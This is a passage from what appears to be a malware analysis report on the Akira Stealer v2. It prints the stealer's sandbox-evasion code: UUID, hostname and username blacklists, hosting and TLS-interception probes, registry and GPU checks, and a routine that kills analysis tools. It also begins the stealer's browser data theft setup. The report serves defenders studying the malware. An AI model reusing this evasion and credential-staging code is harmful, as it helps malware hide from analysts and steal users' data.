'desktop-vkeons4','ntt-eff-2w11wss',\n",[102,9230,9231],{"class":104,"line":674},[102,9232,9233],{}," # ... dozens more entries ...\n",[102,9235,9236],{"class":104,"line":680},[102,9237,9238],{},")\n",[12,9240,9241],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[186,9243,9245],{"id":9244},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[12,9247,192],{},[12,9249,9250],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". These names are low-entropy and often hardcoded in open source sandbox environments.",[56,9252,9254],{"className":8482,"code":9253,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkUsers() -> bool:\n user = os.getlogin().lower()\n return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n 'wdagutilityaccount','abby','peter wilson','hmarc',\n 'a.monaldo','tvm',\n # ... 30+ more entries ...\n)\n",[63,9255,9256,9260,9265,9270,9275,9279,9284,9289,9294,9299],{"__ignoreMap":65},[102,9257,9258],{"class":104,"line":105},[102,9259,8971],{},[102,9261,9262],{"class":104,"line":111},[102,9263,9264],{},"def checkUsers() -> bool:\n",[102,9266,9267],{"class":104,"line":329},[102,9268,9269],{}," user = os.getlogin().lower()\n",[102,9271,9272],{"class":104,"line":346},[102,9273,9274],{}," return user in VmProtect.BLACKLISTED_USERS\n",[102,9276,9277],{"class":104,"line":650},[102,9278,7846],{"emptyLinePlaceholder":2180},[102,9280,9281],{"class":104,"line":656},[102,9282,9283],{},"BLACKLISTED_USERS = (\n",[102,9285,9286],{"class":104,"line":662},[102,9287,9288],{}," 'wdagutilityaccount','abby','peter wilson','hmarc',\n",[102,9290,9291],{"class":104,"line":668},[102,9292,9293],{}," 'a.monaldo','tvm',\n",[102,9295,9296],{"class":104,"line":674},[102,9297,9298],{}," # ... 30+ more entries ...\n",[102,9300,9301],{"class":104,"line":680},[102,9302,9238],{},[12,9304,9305],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[186,9307,9309],{"id":9308},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[12,9311,192],{},[12,9313,9314,9315,9318],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. In this case, a simple HTTP request is made to ",[63,9316,9317],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[56,9320,9322],{"className":8482,"code":9321,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkHosting() -> bool:\n http = PoolManager(cert_reqs=\"CERT_NONE\")\n try:\n return http.request(\n 'GET',\n 'http://ip-api.com/line/?fields=hosting'\n ).data.decode().strip() == 'true'\n except:\n return False\n",[63,9323,9324,9328,9333,9338,9342,9347,9352,9357,9362,9366],{"__ignoreMap":65},[102,9325,9326],{"class":104,"line":105},[102,9327,8971],{},[102,9329,9330],{"class":104,"line":111},[102,9331,9332],{},"def checkHosting() -> bool:\n",[102,9334,9335],{"class":104,"line":329},[102,9336,9337],{}," http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[102,9339,9340],{"class":104,"line":346},[102,9341,9134],{},[102,9343,9344],{"class":104,"line":650},[102,9345,9346],{}," return http.request(\n",[102,9348,9349],{"class":104,"line":656},[102,9350,9351],{}," 'GET',\n",[102,9353,9354],{"class":104,"line":662},[102,9355,9356],{}," 'http://ip-api.com/line/?fields=hosting'\n",[102,9358,9359],{"class":104,"line":668},[102,9360,9361],{}," ).data.decode().strip() == 'true'\n",[102,9363,9364],{"class":104,"line":674},[102,9365,9159],{},[102,9367,9368],{"class":104,"line":680},[102,9369,9370],{}," return False\n",[12,9372,9373],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[186,9375,9377],{"id":9376},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[12,9379,192],{},[12,9381,9382,9383,9386],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign HTTPS request to a random subdomain under ",[63,9384,9385],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed.",[56,9388,9390],{"className":8482,"code":9389,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n try:\n http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n except:\n return False\n return True\n",[63,9391,9392,9396,9401,9406,9410,9415,9419,9423],{"__ignoreMap":65},[102,9393,9394],{"class":104,"line":105},[102,9395,8971],{},[102,9397,9398],{"class":104,"line":111},[102,9399,9400],{},"def checkHTTPSimulation() -> bool:\n",[102,9402,9403],{"class":104,"line":329},[102,9404,9405],{}," http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[102,9407,9408],{"class":104,"line":346},[102,9409,9134],{},[102,9411,9412],{"class":104,"line":650},[102,9413,9414],{}," http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[102,9416,9417],{"class":104,"line":656},[102,9418,9159],{},[102,9420,9421],{"class":104,"line":662},[102,9422,9370],{},[102,9424,9425],{"class":104,"line":668},[102,9426,9427],{}," return True\n",[12,9429,9430],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[186,9432,9434],{"id":9433},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[12,9436,192],{},[12,9438,9439,9440,9443],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[63,9441,9442],{},"wmic"," for suspicious GPU strings.",[56,9445,9447],{"className":8482,"code":9446,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkRegistry() -> bool:\n r1 = subprocess.run(\n \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n capture_output=True, shell=True)\n r2 = subprocess.run(\n \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n capture_output=True, shell=True)\n\n # GPU name check\n gpu_out = subprocess.run(\n \"wmic path win32_VideoController get name\",\n capture_output=True, shell=True).stdout.decode().splitlines()\n gpucheck = any(x in gpu_out[2].lower()\n for x in (\"virtualbox\", \"vmware\"))\n return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[63,9448,9449,9453,9458,9463,9468,9473,9478,9483,9487,9491,9496,9501,9506,9511,9516,9521],{"__ignoreMap":65},[102,9450,9451],{"class":104,"line":105},[102,9452,8971],{},[102,9454,9455],{"class":104,"line":111},[102,9456,9457],{},"def checkRegistry() -> bool:\n",[102,9459,9460],{"class":104,"line":329},[102,9461,9462],{}," r1 = subprocess.run(\n",[102,9464,9465],{"class":104,"line":346},[102,9466,9467],{}," \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[102,9469,9470],{"class":104,"line":650},[102,9471,9472],{}," capture_output=True, shell=True)\n",[102,9474,9475],{"class":104,"line":656},[102,9476,9477],{}," r2 = subprocess.run(\n",[102,9479,9480],{"class":104,"line":662},[102,9481,9482],{}," \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[102,9484,9485],{"class":104,"line":668},[102,9486,9472],{},[102,9488,9489],{"class":104,"line":674},[102,9490,7846],{"emptyLinePlaceholder":2180},[102,9492,9493],{"class":104,"line":680},[102,9494,9495],{}," # GPU name check\n",[102,9497,9498],{"class":104,"line":9019},[102,9499,9500],{}," gpu_out = subprocess.run(\n",[102,9502,9503],{"class":104,"line":9025},[102,9504,9505],{}," \"wmic path win32_VideoController get name\",\n",[102,9507,9508],{"class":104,"line":9031},[102,9509,9510],{}," capture_output=True, shell=True).stdout.decode().splitlines()\n",[102,9512,9513],{"class":104,"line":9037},[102,9514,9515],{}," gpucheck = any(x in gpu_out[2].lower()\n",[102,9517,9518],{"class":104,"line":9043},[102,9519,9520],{}," for x in (\"virtualbox\", \"vmware\"))\n",[102,9522,9523],{"class":104,"line":9049},[102,9524,9525],{}," return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[12,9527,9528],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[186,9530,9532],{"id":9531},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real Time",[12,9534,192],{},[12,9536,9537],{},"Rather than only evading detection passively, Akira goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[56,9539,9541],{"className":8482,"code":9540,"language":8484,"meta":65,"style":65},"@staticmethod\ndef killTasks() -> None:\n Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n 'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n # ... dozens more ...\n 'glasswire','requestly'\n)\n",[63,9542,9543,9547,9552,9557,9561,9566,9571,9576,9581],{"__ignoreMap":65},[102,9544,9545],{"class":104,"line":105},[102,9546,8971],{},[102,9548,9549],{"class":104,"line":111},[102,9550,9551],{},"def killTasks() -> None:\n",[102,9553,9554],{"class":104,"line":329},[102,9555,9556],{}," Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[102,9558,9559],{"class":104,"line":346},[102,9560,7846],{"emptyLinePlaceholder":2180},[102,9562,9563],{"class":104,"line":650},[102,9564,9565],{},"BLACKLISTED_TASKS = (\n",[102,9567,9568],{"class":104,"line":656},[102,9569,9570],{}," 'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[102,9572,9573],{"class":104,"line":662},[102,9574,9575],{}," # ... dozens more ...\n",[102,9577,9578],{"class":104,"line":668},[102,9579,9580],{}," 'glasswire','requestly'\n",[102,9582,9583],{"class":104,"line":674},[102,9584,9238],{},[12,9586,9587],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[12,9589,9590],{},[251,9591,9592],{},"Summary",[12,9594,9595],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[12,9597,9598],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[186,9600,9602],{"id":9601},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[12,9604,192],{},[12,9606,9607],{},[251,9608,9609],{},"Blacklisted Hardware UUIDs",[56,9611,9614],{"className":9612,"code":9613,"language":61},[59],"BLACKLISTED_UUIDS = (\n '7AB5C494-39F5-4941-9163-47F54D6D5016',\n '032E02B4-0499-05C3-0806-3C0700080009',\n '03DE0294-0480-05DE-1A06-350700080009',\n '11111111-2222-3333-4444-555555555555',\n '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n '4C4C4544-0050-3710-8058-CAC04F59344A',\n '00000000-0000-0000-0000-AC1F6BD04972',\n '00000000-0000-0000-0000-000000000000',\n '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n '49434D53-0200-9065-2500-65902500E439',\n '49434D53-0200-9036-2500-36902500F022',\n '777D84B3-88D1-451C-93E4-D235177420A7',\n '49434D53-0200-9036-2500-369025000C65',\n 'B1112042-52E8-E25B-3655-6A4F54155DBF',\n '00000000-0000-0000-0000-AC1F6BD048FE',\n 'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n 'A15A930C-8251-9645-AF63-E45AD728C20C',\n '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n 'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n '44B94D56-65AB-DC02-86A0-98143A7423BF',\n '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n '49434D53-0200-9036-2500-369025003AF0',\n '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n '79AF5279-16CF-4094-9758-F88A616D81B4',\n 'FE822042-A70C-D08B-F1D1-C207055A488F',\n '76122042-C286-FA81-F0A8-514CC507B250',\n '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n 'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[63,9615,9613],{"__ignoreMap":65},[12,9617,9618],{},[251,9619,9620],{},"Blacklisted Computer Names",[56,9622,9625],{"className":9623,"code":9624,"language":61},[59],"BLACKLISTED_COMPUTERNAMES = (\n '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n 'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n 'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n 'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n 'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n 'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[63,9626,9624],{"__ignoreMap":65},[12,9628,9629],{},[251,9630,9631],{},"Blacklisted User Accounts",[56,9633,9636],{"className":9634,"code":9635,"language":61},[59],"BLACKLISTED_USERS = (\n 'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n 'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n 'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n 'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[63,9637,9635],{"__ignoreMap":65},[12,9639,9640],{},[251,9641,9642],{},"Blacklisted Analysis‐Tool Processes",[56,9644,9647],{"className":9645,"code":9646,"language":61},[59],"BLACKLISTED_TASKS = (\n 'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n 'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n 'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n 'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[63,9648,9646],{"__ignoreMap":65},[12,9650,9651],{},[251,9652,9653],{},"Core Detection Methods",[56,9655,9657],{"className":8482,"code":9656,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n try:\n raw = subprocess.run(\n \"wmic csproduct get uuid\",\n shell=True, capture_output=True\n ).stdout.splitlines()[2].decode(errors='ignore').strip()\n except:\n raw = \"\"\n return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n \"\"\"Current login username in VM users list.\"\"\"\n return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n http = PoolManager(cert_reqs=\"CERT_NONE\")\n try:\n return http.request(\n 'GET', 'http://ip-api.com/line/?fields=hosting'\n ).data.decode().strip() == 'true'\n except:\n return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n \"\"\"\n Attempt TLS to random subdomain.\n Failure → possible HTTPS interception/sandbox.\n \"\"\"\n http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n try:\n http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n return True\n except:\n return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n \"\"\"\n Look for VirtualBox/VMware in:\n - Registry driver entries\n - Video card name via WMIC\n - Presence of VM-specific folders\n \"\"\"\n r1 = subprocess.run(\n \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n shell=True, capture_output=True\n )\n r2 = subprocess.run(\n \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n shell=True, capture_output=True\n )\n gpu = any(\n x.lower() in subprocess.run(\n \"wmic path win32_VideoController get name\",\n shell=True, capture_output=True\n ).stdout.decode().splitlines()[2].lower()\n for x in (\"virtualbox\", \"vmware\")\n )\n dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n \"\"\"Continuously terminate known analysis processes.\"\"\"\n Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[63,9658,9659,9663,9667,9672,9676,9680,9685,9690,9695,9699,9703,9707,9711,9715,9719,9724,9729,9733,9737,9741,9746,9751,9755,9759,9763,9768,9773,9778,9783,9789,9794,9799,9804,9809,9814,9819,9825,9831,9837,9842,9847,9852,9857,9863,9868,9873,9878,9883,9888,9893,9899,9905,9911,9917,9922,9927,9933,9939,9945,9951,9956,9961,9967,9972,9977,9983,9989,9995,10000,10006,10012,10017,10023,10029,10034,10039,10044,10050],{"__ignoreMap":65},[102,9660,9661],{"class":104,"line":105},[102,9662,8971],{},[102,9664,9665],{"class":104,"line":111},[102,9666,9129],{},[102,9668,9669],{"class":104,"line":329},[102,9670,9671],{}," \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[102,9673,9674],{"class":104,"line":346},[102,9675,9134],{},[102,9677,9678],{"class":104,"line":650},[102,9679,9139],{},[102,9681,9682],{"class":104,"line":656},[102,9683,9684],{}," \"wmic csproduct get uuid\",\n",[102,9686,9687],{"class":104,"line":662},[102,9688,9689],{}," shell=True, capture_output=True\n",[102,9691,9692],{"class":104,"line":668},[102,9693,9694],{}," ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[102,9696,9697],{"class":104,"line":674},[102,9698,9159],{},[102,9700,9701],{"class":104,"line":680},[102,9702,9164],{},[102,9704,9705],{"class":104,"line":9019},[102,9706,9169],{},[102,9708,9709],{"class":104,"line":9025},[102,9710,7846],{"emptyLinePlaceholder":2180},[102,9712,9713],{"class":104,"line":9031},[102,9714,8971],{},[102,9716,9717],{"class":104,"line":9037},[102,9718,9199],{},[102,9720,9721],{"class":104,"line":9043},[102,9722,9723],{}," \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[102,9725,9726],{"class":104,"line":9049},[102,9727,9728],{}," return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,9730,9731],{"class":104,"line":9055},[102,9732,7846],{"emptyLinePlaceholder":2180},[102,9734,9735],{"class":104,"line":9061},[102,9736,8971],{},[102,9738,9739],{"class":104,"line":9067},[102,9740,9264],{},[102,9742,9743],{"class":104,"line":9073},[102,9744,9745],{}," \"\"\"Current login username in VM users list.\"\"\"\n",[102,9747,9748],{"class":104,"line":9079},[102,9749,9750],{}," return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[102,9752,9753],{"class":104,"line":9085},[102,9754,7846],{"emptyLinePlaceholder":2180},[102,9756,9757],{"class":104,"line":9091},[102,9758,8971],{},[102,9760,9761],{"class":104,"line":9097},[102,9762,9332],{},[102,9764,9765],{"class":104,"line":9103},[102,9766,9767],{}," \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[102,9769,9771],{"class":104,"line":9770},26,[102,9772,9337],{},[102,9774,9776],{"class":104,"line":9775},27,[102,9777,9134],{},[102,9779,9781],{"class":104,"line":9780},28,[102,9782,9346],{},[102,9784,9786],{"class":104,"line":9785},29,[102,9787,9788],{}," 'GET', 'http://ip-api.com/line/?fields=hosting'\n",[102,9790,9792],{"class":104,"line":9791},30,[102,9793,9361],{},[102,9795,9797],{"class":104,"line":9796},31,[102,9798,9159],{},[102,9800,9802],{"class":104,"line":9801},32,[102,9803,9370],{},[102,9805,9807],{"class":104,"line":9806},33,[102,9808,7846],{"emptyLinePlaceholder":2180},[102,9810,9812],{"class":104,"line":9811},34,[102,9813,8971],{},[102,9815,9817],{"class":104,"line":9816},35,[102,9818,9400],{},[102,9820,9822],{"class":104,"line":9821},36,[102,9823,9824],{}," \"\"\"\n",[102,9826,9828],{"class":104,"line":9827},37,[102,9829,9830],{}," Attempt TLS to random subdomain.\n",[102,9832,9834],{"class":104,"line":9833},38,[102,9835,9836],{}," Failure → possible HTTPS interception/sandbox.\n",[102,9838,9840],{"class":104,"line":9839},39,[102,9841,9824],{},[102,9843,9845],{"class":104,"line":9844},40,[102,9846,9405],{},[102,9848,9850],{"class":104,"line":9849},41,[102,9851,9134],{},[102,9853,9855],{"class":104,"line":9854},42,[102,9856,9414],{},[102,9858,9860],{"class":104,"line":9859},43,[102,9861,9862],{}," return True\n",[102,9864,9866],{"class":104,"line":9865},44,[102,9867,9159],{},[102,9869,9871],{"class":104,"line":9870},45,[102,9872,9370],{},[102,9874,9876],{"class":104,"line":9875},46,[102,9877,7846],{"emptyLinePlaceholder":2180},[102,9879,9881],{"class":104,"line":9880},47,[102,9882,8971],{},[102,9884,9886],{"class":104,"line":9885},48,[102,9887,9457],{},[102,9889,9891],{"class":104,"line":9890},49,[102,9892,9824],{},[102,9894,9896],{"class":104,"line":9895},50,[102,9897,9898],{}," Look for VirtualBox/VMware in:\n",[102,9900,9902],{"class":104,"line":9901},51,[102,9903,9904],{}," - Registry driver entries\n",[102,9906,9908],{"class":104,"line":9907},52,[102,9909,9910],{}," - Video card name via WMIC\n",[102,9912,9914],{"class":104,"line":9913},53,[102,9915,9916],{}," - Presence of VM-specific folders\n",[102,9918,9920],{"class":104,"line":9919},54,[102,9921,9824],{},[102,9923,9925],{"class":104,"line":9924},55,[102,9926,9462],{},[102,9928,9930],{"class":104,"line":9929},56,[102,9931,9932],{}," \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[102,9934,9936],{"class":104,"line":9935},57,[102,9937,9938],{}," \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[102,9940,9942],{"class":104,"line":9941},58,[102,9943,9944],{}," shell=True, capture_output=True\n",[102,9946,9948],{"class":104,"line":9947},59,[102,9949,9950],{}," )\n",[102,9952,9954],{"class":104,"line":9953},60,[102,9955,9477],{},[102,9957,9959],{"class":104,"line":9958},61,[102,9960,9932],{},[102,9962,9964],{"class":104,"line":9963},62,[102,9965,9966],{}," \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[102,9968,9970],{"class":104,"line":9969},63,[102,9971,9944],{},[102,9973,9975],{"class":104,"line":9974},64,[102,9976,9950],{},[102,9978,9980],{"class":104,"line":9979},65,[102,9981,9982],{}," gpu = any(\n",[102,9984,9986],{"class":104,"line":9985},66,[102,9987,9988],{}," x.lower() in subprocess.run(\n",[102,9990,9992],{"class":104,"line":9991},67,[102,9993,9994],{}," \"wmic path win32_VideoController get name\",\n",[102,9996,9998],{"class":104,"line":9997},68,[102,9999,9689],{},[102,10001,10003],{"class":104,"line":10002},69,[102,10004,10005],{}," ).stdout.decode().splitlines()[2].lower()\n",[102,10007,10009],{"class":104,"line":10008},70,[102,10010,10011],{}," for x in (\"virtualbox\", \"vmware\")\n",[102,10013,10015],{"class":104,"line":10014},71,[102,10016,9950],{},[102,10018,10020],{"class":104,"line":10019},72,[102,10021,10022],{}," dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[102,10024,10026],{"class":104,"line":10025},73,[102,10027,10028],{}," return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[102,10030,10032],{"class":104,"line":10031},74,[102,10033,7846],{"emptyLinePlaceholder":2180},[102,10035,10037],{"class":104,"line":10036},75,[102,10038,8971],{},[102,10040,10042],{"class":104,"line":10041},76,[102,10043,9551],{},[102,10045,10047],{"class":104,"line":10046},77,[102,10048,10049],{}," \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[102,10051,10053],{"class":104,"line":10052},78,[102,10054,9556],{},[186,10056,10058],{"id":10057},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[12,10060,192],{},[6086,10062,10063,10077,10090],{},[1258,10064,10065,10068,10069,10072,10073,10076],{},[251,10066,10067],{},"Initialization:"," Within the ",[63,10070,10071],{},"Akira.__init__()"," constructor, the malware immediately invokes ",[63,10074,10075],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[1258,10078,10079,10082,10083,10086,10087,10089],{},[251,10080,10081],{},"Deep Inspection:"," If the initial test passes, it calls ",[63,10084,10085],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[63,10088,9317],{},", and registry artifact scanning.",[1258,10091,10092,10095,10096,10098,10099,10101],{},[251,10093,10094],{},"Abort Path:"," If any check returns ",[63,10097,8659],{},", indicating a virtual or analysis environment, the code executes ",[63,10100,8663],{},", terminating execution before any data collection or exfiltration routines.",[186,10103,10105],{"id":10104},"_7314-conclusion","7.3.14 Conclusion",[12,10107,192],{},[12,10109,6600,10110,10112,10113,10115],{},[63,10111,8607],{}," module in ",[4328,10114,4683],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[41,10117,10119],{"id":10118},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[12,10121,47],{},[12,10123,10124,10125,4598,10128,10131],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[251,10126,10127],{},"Chromium-based",[251,10129,10130],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[12,10133,10134],{},[251,10135,10136],{},"1. Workspace Setup",[56,10138,10140],{"className":8482,"code":10139,"language":8484,"meta":65,"style":65},"client_dir = Utils.get_temp_folder() # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[63,10141,10142,10147,10152,10157],{"__ignoreMap":65},[102,10143,10144],{"class":104,"line":105},[102,10145,10146],{},"client_dir = Utils.get_temp_folder() # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[102,10148,10149],{"class":104,"line":111},[102,10150,10151],{},"os.makedirs(client_dir, exist_ok=True)\n",[102,10153,10154],{"class":104,"line":329},[102,10155,10156],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[102,10158,10159],{"class":104,"line":346},[102,10160,10161],{}," os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[1255,10163,10164,10171,10174,10177,10180],{},[1258,10165,10166,10167],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine (%TEMP%\\DESKTOP-",[10168,10169,10170],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archiveable location.",[1258,10172,10173],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[1258,10175,10176],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[1258,10178,10179],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no residual files behind.",[1258,10181,10182],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file I/O.",[12,10184,10185],{},[251,10186,10187],{},"2. Supported Browsers",[1255,10189,10190,10233],{},[1258,10191,10192,10195],{},[251,10193,10194],{},"Chromium‑based",[1255,10196,10197,10200,10203,10206,10209,10212,10215,10218,10221,10224,10227,10230],{},[1258,10198,10199],{},"Google Chrome (Stable & SxS)",[1258,10201,10202],{},"Microsoft Edge",[1258,10204,10205],{},"Brave 